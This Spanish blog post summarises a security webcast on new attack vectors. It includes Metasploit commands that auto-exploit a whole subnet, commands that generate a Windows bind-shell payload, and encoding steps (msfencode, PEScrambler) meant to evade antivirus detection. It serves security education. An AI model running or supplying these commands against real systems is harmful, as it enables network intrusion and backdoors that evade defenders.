Nuevos Vectores de Ataques

Paul Asadoorian de PaulDotCom presento un webcast sobre nuevos vectores de ataques llamado "Late-Breaking Computer Attack Vectors".

El webcast tuvo los siguiente tópicos:

* MS08-067 - Slimy Network Worms
* Automated Metasploit - “autopwning"
* Listen to your keystrokes, they are talking to you
* Bypassing anit-virus software
* FAIL Of The Month (FOTM) (Linksys WRT300n vulnerabilities)

Estas son algunas notas de lo mas interesante:

*** Metasploit Autopwn

msf > load db_sqlite3
msf > db_create mynetwork
msf > db_import_nmap_xml mynetwork.xml
- o también -
msf > db_nmap -sS -T4 -O 192.168.1.0/24
msf > db_autopwn -p -e

*** Listen to your keystrokes, they are talking to you

Este es un nuevo método para capturar las teclas tipeadas mediante las ondas electromagnéticas emitidas por los teclados.

En esta URL: lasecwww.epfl.ch/keyboard/ pueden encontrar unos videos demostrativos.

*** Bypassing Anti-Virus Software

Lo mas interesante de este webcast fueron algunos ejemplos sobre como evadir la detección de programas Anti-Virus.

En PASS #1 es creado un payload malicioso con Metasploit 3.2, que escaneado por VirusTotal.com, es detectado por 1 de 36 AVs.

En PASS #2 el archivo payload.exe de PASS #1, es encodeado con msfencode, y el archivo resultante es detectado por 4 de 36 AVs!!

En PASS #3 el archivo payload.exe de PASS #1, es encodeado con PE-Scrambler de Nick Harbour, y el archivo resultante es detectado por 1 de 36 AVs.

En todos los casos el único Anti-Virus que detecto todos los payloads fue el programa gratuito AVG.

PASS #1
./msfpayload windows/shell_bind_tcp LPORT=6453 X > payload.exe

PASS #2
./msfencode x86/shikata_ga_nai -i payload.exe -t exe > sgn-payload.exe

PASS #3
c:\Tools>PEScrambler.exe -i payload.exe -o pepayload.exe

* Link al Webcast - Link a los Slides